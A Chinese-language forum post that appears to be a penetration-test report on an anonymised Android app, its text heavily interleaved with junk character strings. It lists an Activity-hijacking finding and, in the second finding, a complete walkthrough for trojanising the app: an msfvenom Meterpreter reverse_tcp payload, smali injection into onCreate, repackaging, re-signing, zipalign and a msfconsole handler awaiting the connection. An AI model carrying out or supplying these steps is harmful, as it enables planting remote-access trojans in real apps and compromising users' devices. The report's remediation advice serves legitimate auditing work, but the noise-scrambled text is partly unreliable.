. w4 |* S2 P$ |, J* K* ]. J. c4 @) k& n ) Q& @- u; d2 J; ?   6 o1 B! s" o3 {: E! O( J" h0 G. m' C& A3 \; ^

- P3 E- n0 }' d Q* L; @2 x. f2 |! f6 D- [

" Z: c& x' z% L h) I; k # `, s! p# |' L |+ M# Q4 @9 x 1-2 测试结果 " y& u! M; i, Q8 m. w$ w* S 3 K8 l% v) Z$ F) d" h) T

9 V2 ^0 U, a& q; r3 v8 b% R. t4 @& b ^8 |7 Z- `8 G+ J

& J: S, M Y" T$ ~4 `- j + m' K+ q! ~$ I" ?0 J: [4 q   . c0 _4 {; X7 @$ E: T6 c8 H3 {3 I

: k: ]! l+ b: J3 n* X & h9 f9 n4 l: ]3 ]2 n

' x8 G0 ^/ w" ~7 G6 s; @' r ' l2 }# N2 ^& Q1 S% w: N+ H 2 检测结果                    " S7 j( z0 {3 g* o6 ~/ G9 \ ( [# a$ X/ Q* P4 v3 C1 d

- }7 ]' S5 V* z3 H" c/ [5 @( |- r Q: S; f! A7 X

; r" w# F& y# G3 u9 t7 g S $ U& O. w( i$ n0 q! K2 S 2.1 某某某 * `: u3 Z; A) E9 X 9 Q: p2 j( S; |8 D

! x, A: F6 D- _2 Z; |: R / F4 e+ b, p) J5 l" J

1 k- l( _- N2 T6 c ( {8 E3 ?- m1 J2 S% c 2.1.1检测目标 & V4 V/ u& ^; r5 C& x4 B {" H7 u* r/ y) r! _' U5 f

6 T1 }' B- B, E8 C5 A3 C9 G6 l1 I- A- Y. y+ B

9 m& r1 l! q$ f - [; o9 K; [! f z) I7 B2 I 目标地址: 某某某某某某APP 4 d8 D8 S3 h o# B 0 B$ j* R: y/ [- Y+ i0 @- S5 H

. h2 J8 o; n( S/ T+ Z" i ; z$ u. ~0 h# H+ Y$ g) y

6 U) h, _. t4 g; _5 z; I( d" k; t8 K) w+ w- V q5 O' [ 2.1.2检测结果 2 f' @" @/ n7 g% n % D: P( |! w$ l" f- K5 T

0 |0 j# I% Q1 m! A& p$ P + v n: Y( e: r

: p) k2 w& |5 C- k! g9 s1 X 9 w* L& V; C( P# O0 l. s 2.1.2.1 0 b, L9 o) e- F- n ' U U/ f% s* V: j$ B* K4 N

/ k1 q' _) v! f. X5 w4 |2 t. g; e% _( |# J6 ]3 k2 e

* L6 m6 w3 H8 B2 @ 8 g' S9 T; c' j( _5 s) j) m+ b 漏洞链接地址:某某某某某某APP ) C* F' a2 _& n% U' T/ P & K% b9 S' E9 ?& z+ ^! C' s

: X, v; \' M6 j. w2 H% } - U1 N5 f5 H0 e6 o, _& V; E3 R

8 x9 d" G) E' B* A( \, O" a, g/ t* x7 B+ }* L3 X5 b# O   6 d2 y& u" a0 D q 9 q' o1 s) Q3 R5 p- J, Z

" }; Q! x# ^2 a& S( \) L+ e$ W8 O$ W$ U2 x3 I# t5 ?' V

& [) d8 `/ {! Q8 F+ |! | ; k% ^1 F4 N$ W, K% j. I3 G 漏洞分析及取证: 5 G, P {8 R( t6 U# a7 P" f3 J, s" u0 Y6 @

- M5 ~- u" o0 x k; _0 ^ + w# t' M0 R0 |9 L) T

! w( v1 _, I: p$ s: ~' c2 P% o1 `4 w ; c$ z- {. U p- {7 S" f Y                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: # T: X* d' u9 w - Y+ A6 h- U9 ]9 Y5 N) T

3 C5 L4 O" }5 P" H. c 3 h! p5 g6 I! c. x+ C" `8 b

7 @. |' N0 F" T5 S: p! E7 s 4 V5 a# W9 J3 f) d      ! G2 k% O! P( I) J6 W' p! o7 w & a$ i! T. z, i; v

' ?! n' P/ z2 p) \: z- ] 5 I P( {0 I& _1 W f) X2 T/ r3 T# ~

% p8 _6 H6 L a) _ 4 F; Y7 l; }6 L0 I0 a R                       & M. W/ r. G9 V- r$ L5 N ( f' L$ M+ f( s* X. B

% x! |( G" M2 ]' ]& X ( z+ q) s. \ h) p

$ O- H& s% v! [. i $ F2 T2 }# n5 P3 \: }$ a. E2 R. v( Y 6 H6 `. g5 C0 X5 q4 S8 @7 f$ B1 ^ ; O7 f; D4 |7 `; x& E' I

/ B0 o, S7 N$ R, V % h6 l( a0 f4 o! ^2 A* ^9 i

( Y! G- Y( a& f! V$ _# B 2 m, \2 V$ G) J: ~( h 4 K5 }# W3 R9 e* i9 V9 i" ]9 v$ g! Y @( @5 F0 t6 O m

5 i# {0 g. d- p- e+ I / G6 c4 ^) c' F

& E* ^# y6 z' s x 8 j) y, r* S3 S" { 4 k* S; P# F* d1 U0 } ( f7 t H1 M4 M/ \$ _# L6 _0 Y

7 x G/ A, X5 ~9 D9 P3 U! k2 V( l ( P' @0 a! \: K+ W. H1 N* g2 q

2 ?, P/ d1 L/ G8 w) Z a- j! x * c- R6 @1 d- j$ A! d: L5 T! j1 g 漏洞危害:高 ' @- _! [4 X6 x; _( i 6 A. G: O; L: j7 Q* B# ~# e# v, E, _, n# N# c

9 F5 Z C6 [ Y" b# z ) t5 u% N' A1 Z8 x1 V+ Z; g" ?
- k3 O# F$ P/ m5 I) n8 K6 r$ L2 x/ I* h8 z4 ]! t1 b & L: |# n q. ^6 c* t3 H( A# i; A1 p$ D+ U/ U: q( E$ |" z& w/ h/ F6 H' O+ h# g6 a. K( `' h4 i/ @* B4 F/ ?: a0 u, O6 `5 b' ?4 w) u$ r1 R( J2 `: E+ [8 J* J7 p9 v- t/ `6 T' {# V% P! x' D/ r/ \6 Q0 K8 C& j" s: F2 Q5 Q/ t; H8 K2 B& C g4 X$ Z* I6 }7 ^- J& Q$ h T& H5 G; C! ?- ]4 e5 S a3 a4 X I1 v" e/ L: [, T: f- s* @: v) q9 v% k9 H# D- j J3 c' L$ b, \7 f( A$ y1 z; F/ i! ^: D4 q" K0 \% I! ~; p- {) D, g: z# R8 z, V" q) A4 s2 E% f9 C. p% `! f, P% @) j2 R! p2 K8 U6 n2 e% \+ E) S x+ \& V" B/ g1 q" c+ f8 a# `* x( G& U V" |' a, ]1 l) h1 y" Y5 u, g7 p# \' q3 Y0 n9 C" q J9 e: N) H/ W" I' W0 i9 v
! Z5 n/ h/ p0 j5 |% ^9 W% x/ P F, M+ h: q9 q

7 W, u# ?4 t+ {7 e- k- H; \ ( t" T8 a2 ]4 p) S" \ 严重程度 8 G4 {4 ?9 i4 |2 ^$ `# Q 2 b( T1 ?+ c# M( M1 d1 j4 T+ C

4 t7 }* M/ B) K. t 6 j* G# a# L! e) M6 [( j 		t, @9 h' O+ R& P9 g & {. p7 \/ n2 `# a2 H

' c$ Y; \# e$ N, S8 F) Y% S4 H4 a3 E ' `% c7 n9 ]+ H: L# W' |4 ` D5 b ! x7 {" G3 k- ~) @8 q9 |' s8 q- p0 g2 z$ m8 E1 D* u1 ]

: X; ^- f$ ?0 c5 l) u ) e$ L- u2 X3 i" n' w 		- L5 I6 F4 K0 s6 E' Q, `4 Z 4 _9 C6 a% r+ d! _6 B9 [* q

; F0 ?6 c: ?+ B3 }' F, k# @ 9 I. H* `8 P# a1 R( ` 0 [' j6 P) V9 e& n0 a2 I : j' I# I. S! {6 M0 F; P8 k

& T$ J, I- o% D# e& p, ^ 0 e) B! F8 \' @% ]! F: K& V 		+ O- v; |4 j. O: r- @2 c, v& Q " O' I! r3 ^+ ]4 q4 W" I. `0 k

4 ^+ H' ~( w" f* a m% W# t' ~: J c6 \$ w/ i % x( p0 ]- Z3 H/ O 9 t6 `' E$ a, w6 i

/ C2 ]% _2 j: U T0 P% t$ S h3 Y5 L) l8 Y' ]% v 		& a3 o9 U5 H: W- Z. t8 `+ B P/ q6 `2 f0 o, X! a

V- b+ N3 n* c+ j4 e5 P3 s # u: T) u0 S' U/ r9 F# g2 o% N   " i. y) Q, U) U# W& E0 x; ^- x2 h) c" H& F" x

. D6 O8 a4 q( G6 E0 c0 A1 R- E: X/ S0 @; D' _1 [3 G 		& g7 L' Z. y+ @ S& i# y/ p1 P& L0 d

1 G. \! b7 S6 f' M7 P* c1 V& m& H# ?9 }% g ' i; u( }4 z3 r+ j8 G0 `! o$ [' W- x& J; C& B5 `4 F. |

5 ^$ p2 H/ |! o$ {, t 6 o( z& v1 ?! K7 G6 I3 T 		n% E' |( j. ?( S: S) q: L, D. }6 a1 k7 p1 q

" r w+ ?$ n4 S8 j' F: X 1 ]1 ^2 [3 y8 \# f   . w2 q8 r) a& O% F O" u' N. k& Z9 f7 I" B9 y/ K

* N) q/ E1 u- v- H6 X* S0 S; @# }. \# o# ?7 ]7 Y
, q; b* s( a6 o H" K 1 P7 s! e4 U! B" K" x2 H
) h# S+ F2 P3 L3 T* ~; @2 o9 P( | 6 |3 q5 u4 [# o0 L

9 {! W- T% K* y' P/ o; K 7 `/ _7 c; u; }" a2 \( i   / D- }4 \% i5 T : d* U; p2 f: \ T9 V N N

" \( @) c% c8 m$ g3 y W) k [+ N: f, Q p

2 x. N1 P& X# }& T* U" A0 d6 z% o ( r5 [7 {% Q" c0 g% A 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 3 Y$ {* [% F+ @# o! R; \ ! `2 j5 j) z ?6 G* r1 ?

) k* \+ |3 i5 S7 A; J3 ` M 0 S5 P% Y$ t' h2 o2 y

# n! M+ I: Z2 b& @ ' V6 I+ y2 j1 l$ ]           . z/ o6 p" t6 m( c $ ?$ y% J. P9 ^ y9 f% K0 }

9 g% f* C* P# j# i- ^; Y( \$ E) n% X6 V

! }, ~* C! p# P0 V" m4 Q2 P+ Q8 Y$ l% H) Z$ W   - I' `# H# F( Q& m! K 8 d0 v# O0 v/ v9 k; z

! A' {( L5 z8 }' ` & v) R7 B4 A6 W1 y

m, v' E9 ~' L; o* O, {/ Q % ]9 t: q& \4 S" y% h+ g 2.1.2.2 # Q( Z9 ^3 J4 p* u 4 T9 Z: [1 {0 ^$ C$ l: u6 G

/ ~! m* i) y" Q4 O% E' F6 F' _/ k. R) b3 b- r6 L

: a! S5 z' J6 I: H% f) ?+ K6 l; E 8 k) ~; a5 O! u) P; k* O9 m* M 漏洞链接地址:某某某某某某APP : e0 V# Z: ~: S% b* T, `+ N4 ]9 f* ] 8 @- A6 B0 y! d) a0 ]' |# K1 H

" R% ^( J- w2 [ # E9 `6 D F; ^1 O3 k' Z6 ~, \2 u

! w. D1 u( j6 O z7 p# L0 W * x8 a1 m E. V- J 漏洞分析及取证: 1 x. v9 V7 g4 v0 h7 [5 l+ ^ & i8 t* \6 e: f, x* o- p1 P

$ u$ H8 g' B) V- e* U4 X 6 P. [4 m9 h6 U: U3 q& L

) \/ X# Z7 ~3 N7 ]6 B8 t * K4 d# ]& [" p                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: % j6 E, k5 p4 U* F7 L; f # a( M# m, _7 K3 L8 u0 W& n% p

/ k! p4 p% Q; a% p, J6 [ , V8 ~' l% e" ]. E

( ]1 l# }7 ?' Z2 ? . h# G5 i V5 X/ T1 l( k Metasploit 生成木马 apk / K) R* d# X T. G: f 8 t% P K+ U w/ P; ?. i

3 i5 F# _) j2 R0 J* q 6 Y# X# a+ {/ P* |1 [

W$ P3 S' n& V/ d4 W+ S- r7 S) F7 B msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 2 Y8 s$ Y5 K3 o3 H 2 I3 X# d5 G0 k

# C5 l" [. O. Y! G2 B: a! N / P! w8 E- j h4 D& b# Q

9 j5 D" C3 x! t) N3 `9 V9 P+ b( t, R6 k+ a; P1 K 反编译目标apk和木马apk . T6 _, e' j$ r6 a) R4 {% v* L * {/ p2 ]0 k" A0 |- C

( Q6 v- ^) z+ o& a2 r8 u : ~+ V0 x9 t7 a. K+ H

& a/ g' M1 @. a+ {5 X9 n1 H * R; o" {2 S* t1 }9 n apktool d target.apk
; Y/ R8 Y, G1 k 9 ]4 }0 `4 o: a! M. J- m2 i apktool d cockhorse.apk 5 a( ^4 {# ^8 M' E- F 4 P: p+ A4 @; I* Z7 P

& }: g8 J( B0 P! }' y4 n- I 1 a* I0 i; Z. A( Y4 D2 z7 u/ T( b. s- h

& t6 L. F4 w. D7 o: ~ 2 i, P2 E0 n- |! l& t 木马 apk 注入目标 apk 1 _, R/ d( r& a- G" s' J! u, m1 T9 |& k! b5 E# R: _7 b2 }

! c! S* k& G' V, _ 6 U$ {' F% m9 P4 ~+ `1 x

1 n- {3 E1 y' i, \ |6 Q6 b' ? " S) Q4 ?" R- l8 \ 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
9 @& W" V( F& T( b3 r6 B' ] ' N; [% N1 A% e& P+ S invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V $ D/ }* Y0 R- Z& L u( } G3 g. \+ e2 n7 X8 n

: k, ]" S* u& g/ m) E8 D# `3 D$ k; a" q. @9 m2 Q+ k c ]

) R! p; U ^0 Q5 E : l9 a0 D( t* ^1 I- ?& Z: E 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ; x- I- w' }4 ], f( G- t - s6 S: Y! X+ \& a* ]9 o

9 s- ?- K# J* s# @% u% N 9 E) n' _! j! J6 I& ]: s) L

$ P8 z. \; |& m. q1 M2 l j6 H 7 X; v: k0 D# g# V$ T* F \* s 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ / h3 X* T% e/ X6 i3 }) H5 D; ^2 [( {

: E- T8 a y/ E9 i: O1 r0 y ; {; I6 N! e* N$ I7 c

6 ` j! Z! e* a M- m. u m4 `/ D7 t7 `" X3 k 回编译生成最终 apk C4 {2 Y% Z5 x- c 1 ?9 U" b4 B# \0 D/ }

0 _+ T# A5 L5 N1 ` $ @& l* y H2 \! o0 v8 y

# u) H4 z0 |9 ?0 f 1 f( O7 y. p: c5 f% P% Z/ h 重新打包 : v/ T. I5 F. G/ U4 ~; |7 P& h! R- X! i: J0 K" W! e8 s* h

( v P3 d' ~/ d- Q+ @! h, T5 s9 ~9 E

; o0 Q! D% b5 p0 F* S4 Y Y. ^2 t: d- {# n apktool b -o repackage.apk target_app_floder 3 R1 | J4 z5 Q% h' ]5 ?/ P3 h, P5 O$ s' d+ B9 m

: }0 t0 \& V/ K' }( P' N5 d% x' }2 t' x2 n* F& n

; N+ b5 j. `% ~0 L7 w5 G1 p5 k % X2 [ w% k( q 创建签名文件,有的话可忽略此步骤 5 o3 G4 o# x5 y. i, t* f 7 U9 @: U* Z2 j% i& d

6 S1 z. x' }5 Y* c1 T " n. O0 A8 o1 t8 X' V) i* ~2 Z

' h/ ~( U3 @/ _7 o3 {- z5 U $ U% H1 z+ d& A5 \4 I' | keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                # s# E" C d6 s1 h4 d1 o4 M/ k0 i* z! y( i" C& l

5 _$ R& h. B" y6 Q+ P5 \ D 0 X: b q7 A; ]& J+ W8 y N1 F

. A0 i1 c' q* z# f4 ?) t& h" y8 T4 l% f" s" Q. ?" j, M/ T7 V 签名,以下任选其一 + i% [5 {9 ^ h; | 1 {* a0 |# r7 v* `& e

* r/ y7 V. `; s& b8 _& T 7 t9 w- ]7 r. W2 s- H

4 s- h, S' m. e+ Q$ `( J ' Q q5 S+ ~6 A jarsigner 方式 * L$ b8 e3 k8 T# q( P9 S& n* g* m9 h, X% ?# R$ @

/ b$ B; l. S6 l! q8 N ) G5 }+ |/ ?' p3 c# j

7 u& z E4 t7 k7 l6 N) m& E' I! o" |& M7 Q! P7 L9 j jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 6 T& V0 }4 C# z6 n0 Z / I( }. R5 U' K+ F0 W2 {. V* P

% G. O, a* t8 E6 z5 I) t+ K ' O1 l H. B9 g* ^

* m1 |3 q# I7 I" R- I" u. S# v8 r3 z h apksigner 方式 - i% v) C+ d7 B1 H! z$ c" T 8 n" D! c8 t" s d( `2 k" ]4 n

5 i# F; i9 g( `, W6 G ( z$ r5 J3 v$ ]3 z9 t( m- p2 P) `# `

# q+ T+ G6 o6 B5 W8 `4 s ! @/ l. H {' e+ x: y) O apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 5 G4 T( t7 j) c, M- I$ O+ P* B% \4 J9 c! E

9 I* I% K, Y0 j5 l) C6 A$ @$ w 2 x: ^! g$ H2 O2 E

# ^- ^* e7 i+ \! S* J, N9 |' ?7 p1 p; a 如需要禁用 v2签名 添加选项--v2-signing-enabled false % o# ]2 I# F$ ^" q1 h U$ s& N+ q: A% G* Y

2 c8 H+ B# ?1 B- E3 V; @ " H) \0 p3 B0 n! p" J

! W8 W+ s! S7 W1 d0 e# G" V+ I) b- c ) s9 [# r+ a6 H. a* f! c 验证,以下任选其一 2 n8 W! M, E6 V5 o O- T6 q6 p2 [: e) J/ j3 O, `8 V- n8 R$ O

1 R# D+ D9 i3 y' X/ G2 n4 [ F% b2 r6 b% j+ P( A

' X( Y Q+ {+ @/ z/ R; f. J 8 o% H! f1 ]1 a9 z( v: ^ jarsigner方式 : q+ x% _$ o' ^/ Q , }; N* \* d1 b

3 E5 J2 |8 x- K( F% z$ } I1 x, a2 ^% X) A+ |4 }8 H: j6 l8 c: _+ x

* j0 [( w' h' \ 4 _ B1 W3 O5 D* E/ C. A& |# F" r jarsigner -verify repackaged.apk ( Y- {4 k4 ?' c& | 7 [3 p2 M! l9 q, o+ ~! @& ~2 t9 Z

; B( `) K0 C/ v, W. L3 m; f; E& B/ Q" B$ A8 M

9 D4 B+ J% Q. {: E# o: v9 P0 _ # Q. B5 c i' M& h0 ~ apksigner 方式 7 w' u4 p. b1 L' r. ` " A1 [1 t+ P0 P# W

, m' [& V2 C0 ]1 N+ _$ `1 q2 [6 X7 J$ ]" O. h& L% ^

, b W; {5 m% J 7 a$ r, ?1 O9 j9 X8 ?" F* ? apksigner verify -v --print-certs repackaged.apk 3 L( L6 a9 G9 {. Z * ^, K& E5 |7 N

' h* Q. L1 i, h+ l# v/ b: z3 ~- A4 n! r/ u* l

( o/ z7 F, K* N2 [# Y+ `- R9 F / i* @. x" o0 g0 U' R- D$ c7 M keytool方式 + P, w. L. x0 G2 k j& w - f6 t Z' _' s) C1 W, r# w

7 b# {/ N, x! n, Q3 U 0 f3 D0 c7 R$ |( f

0 g$ a6 e; Y# \! z% F) p G9 I: M! ^; Z+ u; ^ keytool -printcert -jarfile repackaged.apk 1 P+ N' D4 {, A 5 W+ A/ u! h1 }9 W& u# U6 B

0 q# H( R+ e/ Q8 q2 O1 H; O; B' O, d/ w: P* D" t# P8 ?

2 K5 x/ d' f/ | , ~* Z% H3 p5 I) l 对齐 7 c; e) k8 _7 k; x( K- u ! q( e" M! F( T6 j9 O1 H* X

K; b3 ~ f6 f1 g: B5 y5 v$ N( k$ p+ A C

" B! d$ R2 L3 j! B2 z. `2 S5 ] 7 Q$ b r; x$ t+ ]" I9 K 字节对齐优化 - |8 K! o) `$ [5 t: K2 m U 8 h4 y6 u$ L& F5 b7 l0 O4 E9 q. l

! v" |+ |* h" J5 v2 {$ M7 _2 z , ~( b; @( u, ?8 Y1 M% ^

7 a4 O, i, y" ~( p G/ \, Q7 Q' n9 y; x zipalign -v 4 repackaged.apk final.apk % _$ W+ N2 V+ h * F9 }7 G3 |( k

8 O; Z/ f1 @4 y( n& p% A5 C7 s* N2 {1 K; A# @7 f0 i

! U. H2 s& ~9 I" Y6 I; M6 g ( g; l) {4 h: z8 {8 [7 | 检查是否对齐 ( _9 B$ h: _" c6 K* O 7 o& T1 ~: Z4 M' j* j9 f. ~

% E( @1 ~* j2 k |$ w2 j . S/ ^! h1 s9 m: K1 u$ l

9 i. Y8 K1 a: R2 ]6 X 9 I, J6 H2 G+ T- h/ G' B zipalign -c -v 4 final.apk . p$ }5 l( ]: _! G. D$ U. Z$ G& F6 \# W. O" e% K# ~8 U) e. T

- S! F4 ~2 J& Y, S! b. D2 Z ; p& Z# o- q! I: J: g$ _

# c: H: S: F" r' I/ f1 J) r1 {' X9 e# m# ?3 ?9 b 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 B8 w+ V. B `' d+ S 3 @* s% o% E6 i; [# J# K4 j- i9 B( c

k7 P" o9 ?- K% ?6 F4 {( V+ ~ r3 l, }8 h

0 v `" g/ U0 J, \4 z8 ^; j8 |$ }$ z) | 启动Metasploit控制台,配置参数等待上线 , W* W s# f' B. ?8 ]; J. k5 }! I- D% Y* W' ^' p j7 N4 C

* H% h6 G3 G: a" R. { 2 |6 I5 N) V4 o; S+ R! j1 h

. o% p2 I2 X6 M6 q' m/ p: m# Q# V- i ^0 V4 k 在终端依次输入如下命令 ! H& ?, \' p `6 l5 _# M0 D) d L/ [1 G) t6 \0 V4 O

3 f/ V' \) r5 c* J& h0 C# w# h3 v" g# N+ l) }8 M9 b

* d9 e/ E- W( O, [ ' N2 [5 \; m9 G' K. T msfconsole + \+ r: X, Q0 M5 G' K$ _6 R+ d4 [ 6 K! o0 z! C/ v7 x

2 j/ z5 I7 |9 d! i2 j. n8 N+ L8 d + \8 n1 e( }' D2 G2 m* c; ]2 b

: }- y8 C; q: e $ K+ L! c# v8 l' Y8 T Y" U; [ use exploit/multi/handler 8 @9 e8 S x: d. l7 o: a 3 z6 _9 H2 V2 \$ [1 j

0 V! z5 i5 J1 @& w 5 |" A( a5 t) V+ A/ M8 U" ^

2 ?. ~% Z7 h3 D) o' b * U% \$ {2 K+ l6 R2 n8 [ set PAYLOAD android/meterpreter/reverse_tcp / Y/ C: i; ~4 _( G- z( a0 l) ?0 \9 i- p3 _# E% q. N M

, q: p( ^3 \: a1 |! I0 b. Q1 P/ X6 [2 m" s b# G! k

6 D' r/ l6 Q' f. T' [; W& Z8 C* Z' n" ^ set LHOST 192.xxx.xx.xx $ R, `- c! r( h; T5 D$ l8 [/ H0 N, [ I J) n, o; D I

* R) }, ^, e& Q % Y {( h2 U( o/ d* s& v' O5 x

# X. }" ]; f/ e q9 K! K, j 5 y$ M/ z3 I$ c9 H" \ set LPORT 4444 9 s% \' Q" `7 q: l/ d! ~, O: x6 Z+ L& b7 v7 O

. R; q- }3 d, ], o Y & ?0 l" R( g4 h

/ o1 X2 m# P9 |/ G6 t% ?2 |- ?/ G , ]) A& O. }! A# ] exploit ; W- ]2 U5 w/ E7 [$ ^7 @2 H8 m 6 W3 R4 S& B/ D- s

6 c# d- O! G" I9 s5 l5 F$ T) Y" b

4 S4 `; L8 k; C0 w+ u h# ^+ ]2 L1 `- e# C3 L# d( F 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               / a' K) M, A* K! | 3 J: F& J1 i U2 s, [6 f3 }$ u/ y

! U( h2 Z8 I' R" ^ ; {3 r- n1 \ M/ h4 G

) P/ W0 r: d4 C( t6 l' \$ O; A , X9 y5 k; P4 O. b7 f# B1 t 漏洞危害:中 3 J9 E8 ]% {' P% p% R8 k* X7 L0 r; w# U; E% C

$ l4 n5 a4 }- }6 u5 N, Q2 O # u3 g! N# {& `# H/ ]0 X$ H+ h
( \2 a" ^0 Y7 a" u 2 E3 }$ r) P3 w; h3 } ! E) R9 k6 T& m. ], z+ X6 S* i/ j, @ , i5 T0 o' |& B l2 z ( K* m1 b8 L' k4 I) s* q. M4 Q* P# T* V: f H; B6 v9 |2 Q. w# M4 g% H" I) [3 d+ [5 d; E; ^2 [' |+ U8 x) [: |# U* w6 L) m" @7 t( c7 _% f. V, c* I1 I$ q( j( g( l/ ~' _, x) o" b- ?8 @# r, R& m! ]' L+ {& N; G. `1 B" @ K N/ y& m1 O9 k- U+ k0 p6 }8 ~0 R6 i1 t& w4 L W; n; P2 @$ @; \0 B H7 g2 G+ E! c ]: E& ]" ?# \% ~' @: @ ]0 |# P) O5 [. N D) Y( E8 V' @, v! S2 H- Z0 T9 c L$ P/ t- y8 ~; R/ s6 V- \; {1 X: W" v0 c* T; Y+ S3 I% Z' @# c1 X4 t* J& @% P0 M+ E7 x, d e& V- g3 V8 |+ |( ~. x! |/ ]( n0 s' K6 M _! L+ o. W, E5 J7 D+ ~( \" ~4 M. c
. Z+ i$ ` D, t5 {4 D' _6 r 8 s* }: v4 p7 P9 X. K

% j* c/ N, ^; W+ Z' Y1 v6 L* G/ y6 J K4 y 严重程度 ) R6 I4 e; e" d/ E" K3 W; ^4 L 8 N6 Z' G. U5 o. }: S) r

% I' t$ X- _ O( \ 0 q; t1 ~2 T6 ?: Z$ s- R 		) k3 P: m0 U# L/ B$ n% F ' o: V1 u0 B; }& _

4 b4 j6 n5 v# W& S9 q& x; ^, x , H8 O! z# v4 g. } 2 l7 m& c8 S7 v' ^, F6 U d4 N- E. d4 ` [ Y1 t3 W

0 c+ J/ e! j: S9 [" x3 O 0 W9 K! T$ E* J2 ]! ^0 l. n4 R 		# ~! l) e, w1 @# w' \* y/ f$ b & u4 ?0 E. h" M6 V

q1 U$ u! ?: {8 u) x, F' g* w8 T ! |4 x0 W) a$ D8 s 7 M" e' ~- W0 }! P. D' L. B9 N& |# `- T. C# ]6 w$ Q

2 v _5 I4 D6 V O3 J9 M6 H2 t4 J$ V- R 		( `+ @8 `$ H. Q- s, w: C* b5 G8 p1 v u) U

2 T' h& L8 ^' Y/ @& W: {8 H# H0 q+ R * j {8 t+ C0 z% h! ^) E# k ' I* B3 i% G. ^$ I

. \& ]8 d+ w/ ?' ]' L + | i$ x6 E0 V, { 		8 [ Z: g2 U* u7 y, \ * v$ j! U1 }3 V( W( y + @- f7 O, v- }6 ]$ |6 _ * h3 ~6 d+ P2 C2 J5 ]( i

8 U! i- [; h3 e8 H9 e $ _* N4 y# K I. u   % \) {- R5 z3 {2 W . u, C w6 a' g8 ]9 ^6 g4 y

; {9 _- d2 p+ F' I - b/ c' U2 e2 _ 		4 Z; |6 f: D; z5 f, b; [: P . d9 F! [- a' n5 o! N0 l

. R0 R0 d6 L, g' w% X 6 W5 Y/ G I; ]& S + l* |& N8 A4 h1 Z* k L( v( q9 _1 g7 ~5 V

' r% u( c1 J- A( x1 l8 M ' B0 \- G" V5 v, t 		. s% E2 k: |" Q9 c & @6 } [% B, r- R 4 X' W- X6 _6 [ 6 N" m: L: J0 a* Q) Z' t

/ Y- P- o: e6 F$ J2 m H8 b4 P ) ?+ q) r: E/ Y$ N3 M I   . p0 S0 f( ^8 J* G ) x. Q1 j6 v$ O; m; Z. H: U4 l) c

. }0 f+ u# w* c. P9 a' u! j, N- w. o6 a: V
" R4 A+ d7 [: K( L: B# |5 q# v9 X' k) B# ^- Z, B2 E- z9 y- F
?% Y' @+ q+ v # i/ Y7 U7 |6 X! ^5 f( x/ y

+ G6 i) e. `, x7 ?) N5 g" ~" I" f, E7 P! ]; ~   ! d6 Y4 G1 a! w7 `/ t6 q 1 A" V- F; m _7 Q

2 r$ A7 ~5 B4 p' d. V3 g+ i" e6 j! s& |1 l

) V* o4 H4 [% r0 e ) r9 |' D0 \8 E6 f 修复方法: , y' a5 B- `9 r; t6 e9 e ! U0 |, ^: B4 \/ ?& A1 I

" P4 O- P3 t1 V* N6 I + n1 [/ |! i0 q" o- d7 d

9 B: l3 j* v- M3 v $ F8 Z- B% e8 p/ K& s& ]" s               1. APP 启动时应做签名校验防止二次打包。
3 _* Q% f0 s/ }) D( C" i 6 z0 G2 d2 @; U. t+ w! { c+ z& b! i 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 & w$ v/ E$ ~6 t; D - z' G* H) ]% _, O

+ m5 F7 S, g1 ?" r ' Y4 w9 o+ ~8 b/ @& o - V- u$ B& d# V, w }, M3 L1 s, x ; K( V+ |- w6 l0 ]# z/ Y% P5 q0 D: L

5 p9 L0 u- w! g0 G/ V- [5 w, R1 ^: H- K% E/ f   3 q! Y6 ~7 j1 M0 W " B0 k1 A- V/ N

- d" U) ]6 M6 n3 @, `' A7 }4 v" S4 D3 `" r& r: P 4 X( q0 v. ?, L* [" G) \) S; V) W9 P* N! H8 \

- w& S; S5 s: [6 J" D - G9 u. J0 \+ U0 B' Q3 F/ @) j/ m
7 r% M) G1 b9 A9 E: l4 A% d) S1 P% q# [" E" O

2 y8 S, W7 Y8 m1 f 3 ]- G$ b/ v3 M7 p! e& H" n
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表